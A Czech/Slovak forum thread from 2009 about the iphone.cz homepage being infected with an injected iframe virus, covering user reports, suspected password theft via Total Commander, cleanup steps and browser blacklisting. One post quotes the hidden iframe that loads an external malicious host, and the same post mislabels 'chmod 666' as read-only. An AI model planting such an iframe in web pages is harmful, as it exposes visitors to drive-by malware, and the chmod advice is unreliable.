Viry na www.iphone.cz

vše co vás napadne
milan1988

Viry na www.iphone.cz

Příspěvek od milan1988 »

Ahoj lidi, mám takový problém, vždy když jdu na http://www.iphone.cz tak se mi objeví dvě hlášky o virech na stránce (mám Avast 4 home)
Máte někdo stejný problém?

Yreg

Re: Viry na www.iphone.cz

Příspěvek od Yreg »

Áno, už sa tu o tom pár krát diskutovalo, viac menej to nikto nerieši. Niektorí moderátori tvrdia, že to tak nie je (že sa jedná o "chybu" - ???), nejaký užívateľ tvrdil, že je tam vírus ktorý si ťahá uložené heslá z totalcommandéru a ak získa prístup na nejakú stránku tak sa tam doplní. Viacmenej určite by som tam bez antivíru a nejakého seriózneho prehliadaču nešiel.

edit: pre Julka: rozozná to minimálne Avast, NOD a Google Chrome/Desktop.
Naposledy upravil(a) Yreg dne pon dub 20, 2009 8:00 pm, celkem upraveno 2 x.

Julek
Administrator
Administrator

Příspěvek od Julek »

u mě nic, divné.. mrknu na to

Respektujte pravidla, pak si u mě můžete stěžovat na moderátory.

Obrázek

iTukan
Moderator fóra
Moderator fóra

Příspěvek od iTukan »

Jedna se o vir Iframe...

Julku, staci kdyz se podivam na zdrojovy kod hlavni strany, mas ho hned na zacatku...

Ja napr. hlavni stranku vubec v praci nezobrazim, nase firewally jsou online kontrolovane antiviry a stranky blokuji.

EDIT:
Jo, jestli premyslis jak to odstranit, tak jedine rucne nebo ze zaloh. A hlavne zmenit heslo pro pristup pres FTP.
 MBPR 16"  iPhone 11 Pro  iPad Pro 11"  iPad Mini 2 4G  ATV 4K  Withings SmarScan

tBAcK

Příspěvek od tBAcK »

uhm..aj mne dneska cely cas nod hlasil nejaky virus ae nejak som to podrobnejsie neskumal:P..

mullDie

Příspěvek od mullDie »

Ano, ten vir tam je a nadelal mi nemalou paseku v pracovnim pc :-/

Paly
Starý pes fóra :)

Příspěvek od Paly »

U mna nic nehlasi. Vsetko ide v pohode.
iPhone XS white iOS 13.x,
 iPhone #1 3.1.3
Orange

MacBook Pro retina 2,5 GHz; 8GB RAM
Čítajte pravidlá fóra!

Yreg

Příspěvek od Yreg »

Si robíte srandu nie? Paly, nainštaluj si Avast/NOD alebo Google Desktop/Chrome/Gears a myslím, že aj toolbar to zvládne. Ak máš tak ich aspoň aktualizuj a skús znova.

Ťažko by sa dalo uveriť, že nám to mallware objaví a tebe nie.

terry

Příspěvek od terry »

A co takhle říci Windows ne a přejít na Mac?
iPhone 4 16GB iOS 5 beta | MacBook Air 13" C2D 1.86 GHz, , 4GB RAM, 128GB SSD

Yreg

Příspěvek od Yreg »

pmg, tak asiže to budem skúšať z pc ;)

A terry, páči sa mi tvoja stratégia, majme vírusy na hlavnej stránke a ak bude niekto pindať, odporúčme mu aby si kúpil mac..

Paly

Příspěvek od Paly »

Mam MAC a nezobrazuje mi ziadnu hlasku :). Neviem cim to je Yregu, ale myslim, ze to rychlo odstrania. Dufam.
 iPhone #1 3.1.3
Orange

Čítajte pravidlá fóra!

Yreg

Příspěvek od Yreg »

Keď vám priamo napíšem programy, ktoré to vedia zobraziť, tak nie je moc produktívne tam skúsiť príjsť z ľubovoľným počítačom bez nich a napísať "mne to nič nezobrazuje". Je celkom pochopiteľné, že je to vírus len na Windows. Pri podieli, aký má Apple na trhu počítačov sa divím ľuďom, čo robia vírusy na Macy. Je vôbec ttlcmd na mac?

Myslím, že je pre portál dosť hanba, že tam niečo také je a malo by sa to čo najskôr vyriešiť..

spachal_tmp

Příspěvek od spachal_tmp »

No v kazdem pripade je v IE7 rozhozeny layout, stranky se nacitaji znacne chaoticky. V Gecku, Opere, Chrome i Safari je to v pohode. A nejedna se o nejaky problem s lokalni cache, zkousel jsem to i v IE6 na 'ciste' virtualni masine ..

iTukan
Moderator fóra
Moderator fóra

Příspěvek od iTukan »

A je to tu stale... :shock:

V souboru byl nalezen virus Exploit.HTML.IFrame-6

Yregu, divim se, ze se cilis. Zdejsi admini prece maji vzdycky pravdu, a kdyz reknou, ze tam nic neni, tak tam nic neni... :roll:
 MBPR 16"  iPhone 11 Pro  iPad Pro 11"  iPad Mini 2 4G  ATV 4K  Withings SmarScan

burr0head

Příspěvek od burr0head »

i Opera a Nod32 to hlasi..kdo neveri, at tam bezi :))
iPhone 4S iOS 7 ,Vodafoun

berkoff

Příspěvek od berkoff »

Bych umazal <iframe src="http://sefauro.net/?click=282C89C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe> a nastavil soubor index.php na chmod 666 tj jen na cteni, pak je to v pohode :) Stejne jsem to resil na pipni.

rony
Klub čistého iOS
Klub čistého iOS

Příspěvek od rony »

Prosim vas, v pripade virusu tohto typu bude konstruktivni a pre tentoraz si odpustite hlasky o "mam mac, mne sa nic nezobrazuje".

Staci ak tu 1x bola pritomnost virusu preukazana a je treba konat a nie riesit chujoviny. Bez prepacenia za vyraz!!!

Uvedomte si doprdele, ze sem chodia denne tisice ludi, kolko pocitacov ste za tolko hodin vahania nakazili?

Ak je to ten virus aky myslim, tak VSETCI, co mate pristup k hostingu, ZRUSTE pouzivanie Total commanderu az do casu, ked dokazete, ze je bezchybny. Toto urobte bezodkladne!!! A pekne prosim, neoznamujte si to navzajom mailami ale prinajmenej mobilom.

Jedno ci je niekto chory, chromy, lenivy, nasrany, prilis bohaty alebo mrtvy. Musi urobit vsetko nevyhnutne.

Na http://www.iphone.cz to uz reportuje aj Firefox:

Reported Attack Site!

This web site at http://www.iphone.cz has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

To znamena, ze uz je iphone.cz v databazach - pekne pani.

Ten majster, co robil uvodnu stranku, pozdravujem!
/\/\ /\ > /\ / Facebook skupina Uživatelé Apple Watch a fb.com/forum.iphone.cz
 mac mini  iPhone  4  5S  X  13 Pro  iPad Pro  Pencil  TV4  HomePod  WATCH  AirPods

ls8

Příspěvek od ls8 »

Virus se sem mohl dostat nekolika zpusoby:

1/ nekdo hacknul webovy server cables.cz - nutno konzultovat s administratorem serveru
2/ nekdo vyuzil diry v phpBB - nutno provest upgrade enginu fora na nejnovejsi verzi
3/ nekdo se dostal k heslu pro pristup na server, kde jsou stranky ulozene - hesla nutno zmenit (v kazdem pripade, bez ohledu jestli pricina je 1/, 2/ nebo 3/)
iPhone XS 64GB | MacMini 2018 | MacBook Pro 15 2013

rony
Klub čistého iOS
Klub čistého iOS

Příspěvek od rony »

s najvacsou pravdepodobnostou je cesta cez Total Commander s ulozenym uctom FTP k iphone.cz zo zavireneho PC u pouzivatela Internet Exploreru. Treba to bezodkladne riesit!!!

* odvirit svoj pocitac
* prestat pouzivat Total Commander na FTP do okamihu ako prejdes na iny FTP program resp. upgradovany TC, ktory zarucene netrpi problemom so sifrovanim hesiel
* zvazit pouzivanie IE
* odstranit virus z uvodnej stranky iphone.cz
* zmenit hesla k FTP uctom
* upgradovat PHPBB pokial je dalsim zdrojom dier
* komunikovat so vsetkymi na hostingu, ktori maju FTP ucty a obdobny problem (TC, IE...)
 mac mini  iPhone  4  5S  X  13 Pro  iPad Pro  Pencil  TV4  HomePod  WATCH  AirPods

iTukan
Moderator fóra
Moderator fóra

Příspěvek od iTukan »

Rony, doufam, ze to byla vytka na adminy a ne na uzivatele, protoze na zavirovany server bylo upozornovano na zacatku dubna!!! Vzdy s vysledkem, ze to zamcel admin a nic se nedelo, protoze oni nic nevideli a oni jsou bohove...

viz:
http://www.iphone.cables.cz/viewtopic.php?f=1&t=16034&hilit=virus
http://www.iphone.cables.cz/viewtopic.php?f=7&t=16097

Jinak ze tento vir se siri hlavne diky nekodovanym heslum v total commanderu se vi. Ted musi admin serveru zapracovat...

S474N
Sons of Jailbreak
Sons of Jailbreak

Příspěvek od S474N »

LOL., to s tim TC jsem rikal uz davno, ale nikdo neveril, ach jo :roll:

viewtopic.php?f=27&t=16085&p=140405#p140405
Obrázek

iPhone 7 128GB Silver, v10.1.1 CZ nonJB :(
iPad Air 2 64GB Cellular Black, v9.0.2 CZ JB

rony
Klub čistého iOS
Klub čistého iOS

Příspěvek od rony »

itukan: SAMOZREJME. Len si uvedomte, ze moderatori nie su admini, nemaju ine prava ako tie v diskusnom fore. Netreba si ich pliest. Ani ja ako moderator s tym nic nemozem urobit len plieskat o hlavu kym sa to nezmeni.

Problem je v tom, ze pred par dnami nabehol novy http://www.iphone.cz a virus tam preplachtil tiez.

Ano: moze za to Total Commander!

Julek
Administrator
Administrator

Příspěvek od Julek »

marek nezvedá telefon, napsal jsem email tomu kdo delal nový iphone.cz .. jiný kontakt bohužel nemám

Obrázek

Julek
Administrator
Administrator

Příspěvek od Julek »

UP: tak prý opraveno .. někdo to zkontrolujte já mám MAC,
ftp fora a data zde mám ochráněné dobře
na ftp iphone.cz se už nedostanu .. ale snad to opravil koder + necham zmenit heslo na ftp iphone.cz

Obrázek

Ciko

Příspěvek od Ciko »

V Google Chrome to pořád hlásí vir a to jak na iphone.cz tak i tady na fóru.

Julek
Administrator
Administrator

Příspěvek od Julek »

ok pisu Milanovi at overi forum.. :x

Obrázek

iTukan
Moderator fóra
Moderator fóra

Příspěvek od iTukan »

Na foru jsem vira nevidel pred tim a ani ted.

Stranky iphone.cz to bude chtit dostat z blacklistu virovych databazi, jinak to nepujde ani kdyz je to opravene. Dostaly se tam diky tomu, ze byly zavirovany prilis dlouho.

EDIT:
Treba neco pomuze z tohoto:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=cs&site=http://www.iphone.cz/

Po obejiti zabezpeceni na podezrele stranky mi to stranky nacte a vira nehlasi. Ale ta blokace tam asi nejakou dobu bude.
Naposledy upravil(a) iTukan dne úte dub 21, 2009 10:00 am, celkem upraveno 1 x.

Julek
Administrator
Administrator

Příspěvek od Julek »

Drsoň mi teď také potvrdil že fórum mám čisté. iPhone.cz si musí zajistit Marek

Obrázek

waczko
Mírně pokročilý
Mírně pokročilý

Příspěvek od waczko »

tohle už je blacklist
Obrázek
iPhone 2G 8GB -> iPhone 3G 8GB Black -> iPhone 4S 16GB White iOS 5.0.1
iPad 16GB WiFi + 3G: iOS 4.3 -> iOS 4.3.1 JB -> iOS 5.0.1

WebDeveloper
POMOZTE!! SBÍREJTE, NAKUPUJTE x) http://goo.gl/mJEzc

Julek
Administrator
Administrator

Příspěvek od Julek »

jj my víme, tohle at si udela marek, koder psal ze je komplet novej zdrojak, prepsana hesla atd..

Obrázek

mullDie

Příspěvek od mullDie »

je to krasny, kdyz pulku dne odstranujete havet z iPhone webu... a jeste krasnejsi, kdyz vite, ze s tim nikdo nic nedela a muze se to stat dalsim a dalsim lidem

Julek
Administrator
Administrator

Příspěvek od Julek »

ne ne ne pozor, uz to bylo davno odstranene, ted jen ve firefoxu jsme na black listu, ver mi ze jako admin fora delam co muzu aby i iphone.cz bylo ok, bohuzel nemam pristup na ftp co se tyce iphone.cz

Obrázek

ls8

Příspěvek od ls8 »

Urcite? V prvnim prispevku tohoto vlakna (ze vcerejska) uzivatel tvrdi, ze mu Avast stale hlasi pritomnost viru, ne blacklistovanou adresu.

Mimochodem, ten blacklist neni jen ve Firefoxu, ale asi ve vsech browserech vcetne Safari na Mac OS X:

Obrázek
iPhone XS 64GB | MacMini 2018 | MacBook Pro 15 2013

Paly

Příspěvek od Paly »

Ano takato hlaska sa mi zobrazuje od dnesneho rana.
 iPhone #1 3.1.3
Orange

Čítajte pravidlá fóra!

Clant

Příspěvek od Clant »

samí problém, používám NODa a Firefox. Jakmile napíšu iphone.cz tak první upozornění ze strany mozilly (blacklist jak jste zmínili) a hned potom NOD na mě bafne, že je nějakej vir v něčem a že pozastavuje stahování dat z iphone.cz

hehe :D

iTukan
Moderator fóra
Moderator fóra

Příspěvek od iTukan »

nene, vir je odstranen... ve FF sice mam hlasku o blokovani (diky blacklistu), ale pri ignorovani antivir (Avast, AVG) nic nehlasi (rano jeste ano). V IE se dokonce ani hlaska o blokaci nezobrazi a zdrojovy kod je cisty bez iframe... Stranka se zobrazi korektne.

Julek
Administrator
Administrator

Příspěvek od Julek »

počkáme na google bota až to prolítne, už by to pak mělo být ok

Obrázek

S474N
Sons of Jailbreak
Sons of Jailbreak

Příspěvek od S474N »

mullDie píše:je to krasny, kdyz pulku dne odstranujete havet z iPhone webu... a jeste krasnejsi, kdyz vite, ze s tim nikdo nic nedela a muze se to stat dalsim a dalsim lidem

Pulku dne? Rozhlidni se poradne, kdy se tady uz na to upozornovalo, ze to tam je :wink: To je prachsprosty slendrian.
Obrázek

iPhone 7 128GB Silver, v10.1.1 CZ nonJB :(
iPad Air 2 64GB Cellular Black, v9.0.2 CZ JB

spachal_tmp

Příspěvek od spachal_tmp »

Damy a panove, Julek to uz napsal snad naprosto jasne: nikdo, vcetne jeho jakozto jednoho ze dvou adminu zde na foru, nema krome jisteho pana Marka Zabrodskeho (admina), majitele domeny, moznost toto ovlivnit. Pan Zabrodsky o problemu najisto vi a pokud s tim neudela on nic, my nezmuzeme uz zcela nic. Je to jeho 'vizitka'.

Kontakt na nej je zde: http://www.iphone.cables.cz/memberlist.php?mode=viewprofile&u=2, http://www.iphone.cz/site/kontakt. Pokud mate zajem o reseni, ne jen o jizlive konstatovani stavu veci, kontaktujte jej. Osobne si nemyslim, ze to bude mit nejaky vyznam, ale to je asi tak vse, co s tim my jakozto clenove fora, muzeme udelat.
Pan Zabrodsky bude pravdepodobne osobne pritomny i na blizicim se srazu, muzete to s nim probrat osobne. V uvedenych kontaktech je dostatecne mnoho zpusobu, jak s nim navazat komunikaci.

Je zcela zbytecne zde uvadet nektere argumenty stale dokola, je to prinejmensim ztrata vaseho casu.

A muzete nam verit, ze nas moderatory i admina Julka, kteri mame zajem o co nejlepsi 'beh fora' i webu obecne, to .. mirne receno .. nemrzi. Probirame to (a ne prvne) i mimo verejnou cast fora, ale vysledek je prakticky shodny s tim zde uvadenym. Je zbytecne nam za to nadavat, v tomto pripade proste nemame jakoukoliv moznost tento stav zmenit. Napsal jsem to dostatecne jasne a srozumitelne? Pevne verim, ze ano.

Paly

Příspěvek od Paly »

Spachal to krasne vysvetlil, ja zamykam!
 iPhone #1 3.1.3
Orange

Čítajte pravidlá fóra!

Zamčeno